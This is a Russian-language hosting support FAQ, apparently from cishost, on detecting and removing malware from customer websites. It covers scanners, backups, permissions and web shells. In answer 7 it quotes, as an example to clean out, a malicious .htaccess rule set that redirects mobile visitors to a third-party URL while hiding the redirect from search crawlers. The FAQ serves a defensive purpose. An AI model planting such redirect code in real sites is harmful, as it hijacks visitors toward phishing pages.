Сайты зачастую становятся объектами для атак злоумышленников. В данной статье рассмотрены решения по наиболее часто поступающим вопросам в техподдержку от клиентов.

1. Как вредоносный код попадает на сайт?
Вредоносный код попадает на сайт через уязвимость в скрипте и необновленные CMS, либо был скомпрометирован пароль от FTP.

2. Какая защита установлена на хостинге?
На сервере отключены большинство опасных функцией php, отключен ssh для всех, установлены файрволлы. Системные файлы сервера проверяются на руткиты.

3. Есть ли вероятность заражения с соседнего аккаунта?
Вероятность заражения с соседнего аккаунта крайне мала, так как все скрипты работают только в своих директориях, open_basedir не дает им доступа к другим папкам на сервере.

4. Как выявить и устранить вредоносный код?

• Базовые рекомендации по защите и выявлению угроз представлены в статье: blog.cishost.ru/2013/06/20/vzlom-saytov-na-cms.html
• Осуществить проверку антивирусными сканерами Clamav/Maldet для поиска вирусов в папке пользователя: Панель управления — Менеджер файлов – кликнуть по папке – кнопка «Антивирус».
• Проверить файлы бесплатными сканерами, например, virusdie.ru, avirlab.com и т.п.)
• Обновлять СMS до последних версий, чаще менять и устанавливать сложные пароли.

5. Если файлы сайта были заражены, то обязательно ли удалять резервные копии или в архиве они не опасны?
Зараженные файлы представляют опасность только при распаковке

6. Последнее время мой сайт отображается в поисковых системах как распостраняющий вредоносное ПО, пожалуйста, проверьте его на вредоносное ПО и вредоносные ссылки. Если можно что-то исправить и изменить напишите.
Проверку можно осуществить через Панель управления — Менеджер файлов – кликнуть по папке – кнопка «Антивирус». Запускается антивирусный сканер Clamav/Maldet для поиска вирусов в папке пользователя. Так же настоятельно рекомендуем скачать бэкап аккаунта, распаковать, проверить файлы популярными антивирусными программами, чистые файлы залить по FTP обратно в корневой каталог.

7. Два моих сайта, блокируется Касперским.Вот ответ Касперского:
«Это не ложное срабатывание. Сайт был взломан, был заменён файл .htaccess.
Если вы являетесь вебмастером данного ресурса, необходимо исправить данный файл и отписать нам на [email protected]». Я в командах .htaccess не разбираюсь. Помогите, что в файле не так?
Необходимо вручную вычищать код:
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|yahoo!\ slurp|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) site.net/s/5373 [L,R=302]

К примеру, тизерные скрипты могут прописывать сторонний код перенаправления пользователей мобильных устройств в .htaccess, и добавлять туда строки перенаправления на фишинговые сайты.

8. Постоянно меняются права папок на 555
На Ваши папки установлены права 555. Это говорит о том, что с Вашего аккаунта распространяется спам: <a blog.cishost.ru/2015/03/02/esche-raz-o-malware.html
Проверьте файлы на наличие спам-кода в соответствии с материалами статьи с базовыми рекомендациями по защите и выявлению угроз: https://blog.cishost.ru/2013/06/20/vzlom-saytov-na-cms.html

9. Не получается побороть вирус, делаю бэкап на более ранние даты, позже все равно вирус возвращается. Сканировал бэкап файл, антивирусник не видит вируса. Также после бэкапа какое то время сайты работаю хорошо, но дальше вирус возвращается. Как быть?
Видимо у Вас shell-скрипт — антивирусные программы его не видят, проверьте по статье: <a blog.cishost.ru/2013/06/20/vzlom-saytov-na-cms.html">https://blog.cishost.ru/2013/06/20/vzlom-saytov-na-cms.html